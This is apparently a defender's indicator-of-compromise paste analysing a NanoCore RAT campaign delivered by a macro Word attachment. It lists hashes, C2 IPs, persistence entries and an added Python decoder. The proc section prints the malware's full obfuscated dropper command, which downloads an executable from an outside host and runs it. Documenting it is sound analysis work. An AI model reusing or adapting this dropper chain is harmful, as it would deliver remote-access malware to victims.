#IOC #OptiData #VR #nanocore #RAT #macro
https://pastebin.com/yiaWaNvQ

previous_contact:
25/04/19 https://pastebin.com/cSy68j5q
07/01/19 https://pastebin.com/e5f24Y8F

FAQ: https://krebsonsecurity.com/2018/02/bot-roundup-avalanche-kronos-nanocore/

attack_vector
--------------
email attach .DOC > macro > GET JS > GET exe

email_headers
--------------
Received: from lrwdd2.directrouter.com (lrwdd2.directrouter.com [206.123.119.186])
Date: Mon, 05 Aug 2019 04:22:00 -0500
From: cellardoor@palmerwines.com.au
To: user00@victim77.com
Subject: Fwd: Purchasing Oder
X-Sender: cellardoor@palmerwines.com.au
User-Agent: Roundcube Webmail/1.3.8

files
--------------
SHA-256   ff1fe92b711075243cbb176d5e98dd07478a809db12c2189bb12a3874f10339c
File name PO URGENT.doc
File size 508 KB (520192 bytes)

SHA-256   1148d46151ef33f158bab7fb99a6cd84f3b27a627994bd5f2a55b5fea029e55f
File name azz.js
File size 80.05 KB (81970 bytes)

SHA-256   b3e668b755ceb4754b118ba8ec718755f4dbd37ef572a268e1d5b2a8d6d07ba7
File name hercilio.exe
File size 203 KB (207872 bytes)

activity
**************
PL_SCR
h11ps\kcexports{.} me/azz.js
h11ps\kcexports{.} me/hercilio.exe

C2
67.207.93.17
185.244.31.111 1606

netwrk
--------------
[ssl]
167.71.13.65 kcexports.me Client Hello

comp
--------------
WINWORD.EXE 2888 TCP localhost 49217 162.255.119.195 443 SYN_SENT
wscript.exe 1124 TCP localhost 49219 162.255.119.195 443 SYN_SENT
wscript.exe 2664 TCP localhost 49222 67.207.93.17 7744 SYN_SENT
EJV.EXE 1368 TCP localhost 49226 185.244.31.111 1606 SYN_SENT

proc
--------------
"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
"C:\Windows\System32\WScript.exe" "C:\tmp\mczekg5e.js"
"C:\Windows\System32\wscript.exe" //B "C:\Users\operator\AppData\Roaming\KQWPXSGZoR.js"
"C:\Windows\System32\cmd.exe" /c cd %temp% &@echo Y3x = " h11ps\kcexports{.} me/hercilio.exe">>B3g.vbs &@echo W8r = M8m("jo{Sj}j")>>B3g.vbs &@echo Set S5z = CreateObject(M8m("rx}rqWS}rqmyyu"))>>B3g.vbs &@echo S5z.Open M8m("ljy"), Y3x, False>>B3g.vbs &@echo S5z.send ("")>>B3g.vbs &@echo Set J8g = CreateObject(M8m("fitigSxywjfr"))>>B3g.vbs &@echo J8g.Open>>B3g.vbs &@echo J8g.Type = 1 >>B3g.vbs &@echo J8g.Write S5z.ResponseBody>>B3g.vbs & @echo J8g.Position = 0 >>B3g.vbs &@echo J8g.SaveToFile W8r, 2 >>B3g.vbs &@echo J8g.Close>>B3g.vbs &@echo function M8m(H7m) >> B3g.vbs &@echo For B6c = 1 To Len(H7m) >>B3g.vbs &@echo E7e = Mid(H7m, B6c, 1) >>B3g.vbs &@echo E7e = Chr(Asc(E7e)- 37) >>B3g.vbs &@echo O9c = O9c + E7e >> B3g.vbs &@echo Next >>B3g.vbs &@echo M8m = O9c >>B3g.vbs &@echo End Function >>B3g.vbs& B3g.vbs &dEl B3g.vbs & timeout 13 & EJV.EXE
"C:\Windows\System32\WScript.exe" "C:\tmp\B3g.vbs"
C:\Windows\SysWOW64\timeout 13
C:\tmp\EJV.EXE
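The cmd.exe line in the proc section writes B3g.vbs with a tiny string decoder, M8m(), that shifts every character back by 37, so the COM ProgIDs and the output filename never appear in clear text in the command line. The Python below is an added analyst example, not part of the original paste or of the malware; it reverses that routine and pulls every M8m("...") literal and the Y3x download URL out of the command line so the dropper's real behaviour (XMLHTTP GET, ADODB stream save as EJV.EXE) can be read at a glance. Function names are my own; the command line is the one in this paste, URL left defanged as written.

```python
import re

# The obfuscated cmd.exe line copied from the proc section of this paste.
# The URL inside it is left defanged exactly as the paste writes it.
DROPPER_CMDLINE = r'''"C:\Windows\System32\cmd.exe" /c cd %temp% &@echo Y3x = " h11ps\kcexports{.} me/hercilio.exe">>B3g.vbs &@echo W8r = M8m("jo{Sj}j")>>B3g.vbs &@echo Set S5z = CreateObject(M8m("rx}rqWS}rqmyyu"))>>B3g.vbs &@echo S5z.Open M8m("ljy"), Y3x, False>>B3g.vbs &@echo S5z.send ("")>>B3g.vbs &@echo Set J8g = CreateObject(M8m("fitigSxywjfr"))>>B3g.vbs &@echo J8g.Open>>B3g.vbs &@echo J8g.Type = 1 >>B3g.vbs &@echo J8g.Write S5z.ResponseBody>>B3g.vbs & @echo J8g.Position = 0 >>B3g.vbs &@echo J8g.SaveToFile W8r, 2 >>B3g.vbs &@echo J8g.Close>>B3g.vbs &@echo function M8m(H7m) >> B3g.vbs &@echo For B6c = 1 To Len(H7m) >>B3g.vbs &@echo E7e = Mid(H7m, B6c, 1) >>B3g.vbs &@echo E7e = Chr(Asc(E7e)- 37) >>B3g.vbs &@echo O9c = O9c + E7e >> B3g.vbs &@echo Next >>B3g.vbs &@echo M8m = O9c >>B3g.vbs &@echo End Function >>B3g.vbs& B3g.vbs &dEl B3g.vbs & timeout 13 & EJV.EXE'''

# M8m() in B3g.vbs does Chr(Asc(c) - 37) per character, i.e. the literals
# were built with a fixed +37 shift and are undone with a -37 shift.
M8M_SHIFT = 37


def decode_m8m(encoded: str, shift: int = M8M_SHIFT) -> str:
    """Reverse the dropper's M8m() routine: shift every character back by `shift`."""
    return "".join(chr(ord(ch) - shift) for ch in encoded)


def extract_m8m_args(cmdline: str) -> list:
    """Return every literal passed as M8m("...") in the order it appears."""
    return re.findall(r'M8m\("([^"]*)"\)', cmdline)


def extract_download_url(cmdline: str):
    """Return the (defanged) URL assigned to Y3x, or None if it is absent."""
    m = re.search(r'Y3x = "([^"]*)"', cmdline)
    return m.group(1).strip() if m else None


def decode_dropper(cmdline: str) -> dict:
    """Map each obfuscated literal to its plain value and collect the download URL."""
    strings = {arg: decode_m8m(arg) for arg in extract_m8m_args(cmdline)}
    return {"strings": strings, "url": extract_download_url(cmdline)}


if __name__ == "__main__":
    result = decode_dropper(DROPPER_CMDLINE)
    for enc, dec in result["strings"].items():
        print(f"{enc!r:20} -> {dec}")
    print("download URL (defanged):", result["url"])
```

The decoded values line up with the rest of the paste: the first literal is the filename EJV.EXE that appears in the comp, proc and drop sections, and the remaining three are the MSXML2.XMLHTTP object, the GET verb and the ADODB stream used to write the downloaded hercilio.exe to disk. The same two regexes work on any command line that reuses this builder, which is why they are kept separate from the shift itself.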
persist
--------------
@HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 05.08.2019 18:05
ARP Service c:\users\operator\appdata\roaming\9907dcbd-0284-49da-87e9-3f380347acb7\arp service\arpsv.exe 22.02.2015 3:49
KQWPXSGZoR c:\users\operator\appdata\roaming\kqwpxsgzor.js 05.08.2019 18:04
wscript.exe //B "C:\Users\operator\AppData\Roaming\KQWPXSGZoR.js"

@C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 05.08.2019 18:04
KQWPXSGZoR.js c:\users\operator\appdata\roaming\microsoft\windows\start menu\programs\startup\kqwpxsgzor.js 05.08.2019 18:04

drop
--------------
%temp%\mczekg5e.js [azz[1].js]
%temp%\B3g.vbs
%temp%\EJV.EXE [hercilio[1].exe]
C:\Users\operator\AppData\Roaming\KQWPXSGZoR.js
C:\Users\operator\AppData\Roaming\9907DCBD-0284-49DA-87E9-3F380347ACB7\ARP Service\arpsv.exe
C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KQWPXSGZoR.js

# # #
https://www.virustotal.com/gui/file/ff1fe92b711075243cbb176d5e98dd07478a809db12c2189bb12a3874f10339c/details
https://www.virustotal.com/gui/file/1148d46151ef33f158bab7fb99a6cd84f3b27a627994bd5f2a55b5fea029e55f/details
https://www.virustotal.com/gui/file/b3e668b755ceb4754b118ba8ec718755f4dbd37ef572a268e1d5b2a8d6d07ba7/details
https://analyze.intezer.com/#/analyses/919c9d77-4d63-4f96-a35b-0a5435c1297d

VR
@